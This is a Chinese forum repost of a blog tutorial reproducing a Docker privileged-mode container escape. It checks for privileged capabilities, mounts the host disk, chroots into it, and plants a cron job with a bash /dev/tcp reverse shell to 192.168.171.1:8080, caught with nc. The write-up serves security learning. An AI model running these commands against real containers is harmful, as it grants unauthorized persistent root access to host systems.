ToB企服应用市场:ToB评测及商务社交产业平台

标题: [docker逃逸] Privileged 特权模式逃逸复现 [打印本页]
作者: 海哥    时间: 2025-1-17 09:27
标题: [docker逃逸] Privileged 特权模式逃逸复现
本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
简述

在 Docker 中,Privileged 特权模式赋予容器几乎与宿主机相同的权限,允许其访问全部设备和内核功能。这种模式虽然提供了灵活性,但也带来了安全风险,可能导致容器逃逸,即攻击者从容器内获取宿主机权限。
环境设置

以特权模式创建容器
  1. docker pull centos
  2. docker run -itd --privileged centos /bin/bash
复制代码

查看当前是否为docker环境:
  1. cat /proc/1/cgroup|grep docker
复制代码

systemd-detect-virt 也可以判断当前是否为容器
  1. systemd-detect-virt
复制代码

查看当前是否为特权模式
  1. capsh --print
复制代码
  1. cat /proc/self/status | grep CapEff
复制代码

CapEff为0000001fffffffff,当前容器为特权模式。
复现

使用lsblk查看磁盘

挂载宿主机根目录
  1. mkdir test
  2. mount /dev/sds3 test
复制代码
挂载成功

使用chroot切换根目录,方便进行筹划任务反弹shell
  1. chroot test
复制代码

创建筹划任务
  1. crontab -e
复制代码
  1. */1 * * * *  /bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.171.1/8080 0>&1"
复制代码

攻击机监听反弹shell,成功反弹了宿主机的shell
  1. nc -lvvp 8080
复制代码


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4